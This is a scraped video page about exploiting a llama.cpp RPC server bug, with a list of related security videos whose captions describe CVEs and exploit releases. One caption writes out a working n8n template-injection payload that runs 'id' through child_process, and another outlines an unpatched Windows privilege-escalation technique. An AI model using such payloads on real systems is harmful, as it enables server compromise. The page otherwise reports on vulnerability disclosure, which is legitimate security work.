Загрузка видео...

Не удалось загрузить видео

На главную

Exploiting llama.cpp’s RPC Server - From Null Buffer to RCE Against PIE + Full RELRO + NX | CVE-2026-34159: The vulnerability is a one-line logic bug in the RPC server’s tensor deserialization pipeline. Youtube: Blog:

NullSecurityX's profile picture

NullSecurityX

11,801 subscribers

19,537 просмотров • 1 месяц назад •via X (Twitter)

LIVE

Anya Rossi• Live Now

Private livecam show

Комментарии: 0

Нет доступных комментариев

Здесь появятся комментарии из оригинального поста

Похожие видео

Zero Click Unauthenticated RCE in n8n (CVE-2026-27493) The chain exploitation method is: Allow User input SSTI exploitation e.g. {{7*7}} ={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}
1:23

Zero Click Unauthenticated RCE in n8n (CVE-2026-27493) The chain exploitation method is: Allow User input SSTI exploitation e.g. {{7*7}} ={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}

NullSecurityX

36,718 просмотров • 1 месяц назад

So here is new local privilege escalation zero-day I discovered, not patched yet too :). In simple terms, if you have a service like RDP that exposes an RPC server, there many system services running as SYSTEM connect to it as RPC clients. If that service is turned off (RDP is off by default), it seems that any other process in Windows can expose the same RPC server using the same endpoint. Now all the RPC calls from that SYSTEM processes will come to this fake server and If the process that deployed the server has SeImpersonatePrivilege, it can escalate to SYSTEM by impersonate the RPC client. In the white paper below, I describe five exploit paths you can abuse. However it's architecture problem and maybe there are more. It's Not A Potato
1:49

So here is new local privilege escalation zero-day I discovered, not patched yet too :). In simple terms, if you have a service like RDP that exposes an RPC server, there many system services running as SYSTEM connect to it as RPC clients. If that service is turned off (RDP is off by default), it seems that any other process in Windows can expose the same RPC server using the same endpoint. Now all the RPC calls from that SYSTEM processes will come to this fake server and If the process that deployed the server has SeImpersonatePrivilege, it can escalate to SYSTEM by impersonate the RPC client. In the white paper below, I describe five exploit paths you can abuse. However it's architecture problem and maybe there are more. It's Not A Potato

Haidar

50,372 просмотров • 1 месяц назад

Exploit PoC Telegram Web app XSS / Session Hijacking 1-click The XSS vulnerability is triggered using the event type web_app_open_link via postMessage. (CVE-2024–33905)
0:31

Exploit PoC Telegram Web app XSS / Session Hijacking 1-click The XSS vulnerability is triggered using the event type web_app_open_link via postMessage. (CVE-2024–33905)

NullSecurityX

91,745 просмотров • 1 месяц назад

If you want to be able to call server functions from the client, RPC is often the move. The Bun + Better Call combo gets you a fullstack solution in very little code. Server, Client, bundling and HMR 👌 had to record a little video showing the setup
3:26

If you want to be able to call server functions from the client, RPC is often the move. The Bun + Better Call combo gets you a fullstack solution in very little code. Server, Client, bundling and HMR 👌 had to record a little video showing the setup

Wes Bos

103,513 просмотров • 7 месяцев назад

CVE 2020-14882: WebLogic Server Unauthenticated RCE via GET request Credit:
0:36

CVE 2020-14882: WebLogic Server Unauthenticated RCE via GET request Credit:

Dark Web Informer - Cyber Threat Intelligence

13,926 просмотров • 1 год назад

🔥MAJOR MILESTONE: PI NETWORK ACTIVATES TESTNET RPC SERVER FOR SMART CONTRACTS Pi Network (Pi Network) has officially launched an RPC server on its Testnet, marking a major milestone toward full programmability. This infrastructure allows developers to simulate, test, and deploy smart contracts within the Pi ecosystem for the first time. This technical update signals a shift from a closed mobile community toward a functional, utility-driven Layer 1 network.
0:30

🔥MAJOR MILESTONE: PI NETWORK ACTIVATES TESTNET RPC SERVER FOR SMART CONTRACTS Pi Network (Pi Network) has officially launched an RPC server on its Testnet, marking a major milestone toward full programmability. This infrastructure allows developers to simulate, test, and deploy smart contracts within the Pi ecosystem for the first time. This technical update signals a shift from a closed mobile community toward a functional, utility-driven Layer 1 network.

BSCN

22,919 просмотров • 2 месяцев назад

CVE-2025-24071: Microsoft Windows File Explorer Spoofing Vulnerability Check out the new security vulnerability I discovered in Windows, which I believe is potentially being sold in the wild. (fixed patch tuesday) Blog post: PoC:
0:46

CVE-2025-24071: Microsoft Windows File Explorer Spoofing Vulnerability Check out the new security vulnerability I discovered in Windows, which I believe is potentially being sold in the wild. (fixed patch tuesday) Blog post: PoC:

0x6rss

45,616 просмотров • 1 год назад

CVE-2023-23397 Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability. Details: #infosec #CyberSecurity #Pentesting #redteam
0:56

CVE-2023-23397 Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability. Details: #infosec #CyberSecurity #Pentesting #redteam

HackGit

39,726 просмотров • 3 лет назад

⚠️ We’ve reproduced CVE-2025-49113 in Roundcube. This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization. If you're running Roundcube — update immediately!
0:29

⚠️ We’ve reproduced CVE-2025-49113 in Roundcube. This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization. If you're running Roundcube — update immediately!

PT SWARM

49,934 просмотров • 1 год назад

Say hello to Eternal Tux🐧, a 0-click RCE exploit against the Linux kernel from KSMBD N-Days (CVE-2023-52440 & CVE-2023-4130) Cheers to Pumpkin 🎃 for finding these CVEs + the OffensiveCon talk from gteissier & Quentin Minster Picavet for inspiration!
1:13

Say hello to Eternal Tux🐧, a 0-click RCE exploit against the Linux kernel from KSMBD N-Days (CVE-2023-52440 & CVE-2023-4130) Cheers to Pumpkin 🎃 for finding these CVEs + the OffensiveCon talk from gteissier & Quentin Minster Picavet for inspiration!

Crusaders of Rust

81,630 просмотров • 8 месяцев назад

CVE-2023-22518 - Improper Authorization Vulnerability In Confluence Data Center and Server Don’t use and never use this vulnerability lightly,because it is a master of data cleaning
1:13

CVE-2023-22518 - Improper Authorization Vulnerability In Confluence Data Center and Server Don’t use and never use this vulnerability lightly,because it is a master of data cleaning

ShimizuKawasaki

97,344 просмотров • 2 лет назад

‼️ CVE-2026-22812: OpenCode v1.0.216 - Unauthenticated RCE CVSS: 8.8 CVE Published: January 12th, 2026 PoC/Exploit: Advisory/PoC: Original Post:
3:47

‼️ CVE-2026-22812: OpenCode v1.0.216 - Unauthenticated RCE CVSS: 8.8 CVE Published: January 12th, 2026 PoC/Exploit: Advisory/PoC: Original Post:

Dark Web Informer

28,847 просмотров • 4 месяцев назад

🚨POC RELEASED🚨PoC for SQL Injection leads to RCE in Wordpress released (CVE-2024-27956). #Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Wordpress #Infosec #CTI #CVE202427956 #Vulnerability
1:06

🚨POC RELEASED🚨PoC for SQL Injection leads to RCE in Wordpress released (CVE-2024-27956). #Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Wordpress #Infosec #CTI #CVE202427956 #Vulnerability

Dark Web Informer

51,329 просмотров • 2 лет назад

Every 3rd website you visit runs Nginx. 18,959,833 of them can be hijacked right now. A bug from 2008 just got a working exploit. CVE-2026-42945 (CVSS 9.2) No login. No access. Just one HTTP request. → Heap overflow → Worker process → RCE Patch ASAP to Nginx 1.31.0 or 1.30.1 PoC is already out:
0:36

Every 3rd website you visit runs Nginx. 18,959,833 of them can be hijacked right now. A bug from 2008 just got a working exploit. CVE-2026-42945 (CVSS 9.2) No login. No access. Just one HTTP request. → Heap overflow → Worker process → RCE Patch ASAP to Nginx 1.31.0 or 1.30.1 PoC is already out:

Het Mehta

151,322 просмотров • 24 дней назад

The first hidden-service RPC on the Anyone Network. See this complete demo of using a fully anonymous RPC with the Rabby Wallet wallet on Sepolia. Your IP, location and metadata are masked by an Anyone circuit, while the RPC host itself is undetectable. Complete freedom and censorship resistance for Ethereum transactions. Protected by Anyone.
0:34

The first hidden-service RPC on the Anyone Network. See this complete demo of using a fully anonymous RPC with the Rabby Wallet wallet on Sepolia. Your IP, location and metadata are masked by an Anyone circuit, while the RPC host itself is undetectable. Complete freedom and censorship resistance for Ethereum transactions. Protected by Anyone.

ANyONe Protocol

127,880 просмотров • 6 месяцев назад

Monad is fast. Monad with shMonad RPC is really fast. Now, you can experience even more speed on Monad with MetaMask. Follow our tutorial to set up shMonad RPC in your MetaMask wallet:
3:52

Monad is fast. Monad with shMonad RPC is really fast. Now, you can experience even more speed on Monad with MetaMask. Follow our tutorial to set up shMonad RPC in your MetaMask wallet:

FastLane Labs

17,034 просмотров • 10 месяцев назад

"A Vulnerability to Hack The World" - CVE-2023-4863 The start of a mini series digging into the recent WebP vulnerability. In this first episode, we explore huffman tables!
17:59

"A Vulnerability to Hack The World" - CVE-2023-4863 The start of a mini series digging into the recent WebP vulnerability. In this first episode, we explore huffman tables!

LiveOverflow 🔴

44,772 просмотров • 2 лет назад

Rce -> uaf 26.4 down better variant of cve-2026-20637 unpatched
0:42

Rce -> uaf 26.4 down better variant of cve-2026-20637 unpatched

zip

19,034 просмотров • 1 месяц назад

Do you use a virtual machine to browse dangerous links safely? If you use the Chrome browser inside that virtual machine, is it secure enough? As you might have guessed, the answer is not so much. We chained six unique CVEs from 2023 listed below. • Chrome Renderer RCE : CVE-2023-3079 • Chrome Sandbox Escape : CVE-2023-21674 • LPE in guest OS : CVE-2023-29360 • VMware Info Leak : CVE-2023-34044 • VMware Escape : CVE-2023-20869 • LPE in host OS : CVE-2023-36802
0:34

Do you use a virtual machine to browse dangerous links safely? If you use the Chrome browser inside that virtual machine, is it secure enough? As you might have guessed, the answer is not so much. We chained six unique CVEs from 2023 listed below. • Chrome Renderer RCE : CVE-2023-3079 • Chrome Sandbox Escape : CVE-2023-21674 • LPE in guest OS : CVE-2023-29360 • VMware Info Leak : CVE-2023-34044 • VMware Escape : CVE-2023-20869 • LPE in host OS : CVE-2023-36802

Theori

139,515 просмотров • 2 лет назад

XML External Entity (XXE) vulnerability in 2026 with a practical Proof of Concept (PoC) Follow us: #BugBounty #CyberSecurity
1:13

XML External Entity (XXE) vulnerability in 2026 with a practical Proof of Concept (PoC) Follow us: #BugBounty #CyberSecurity

NullSecurityX

11,524 просмотров • 2 месяцев назад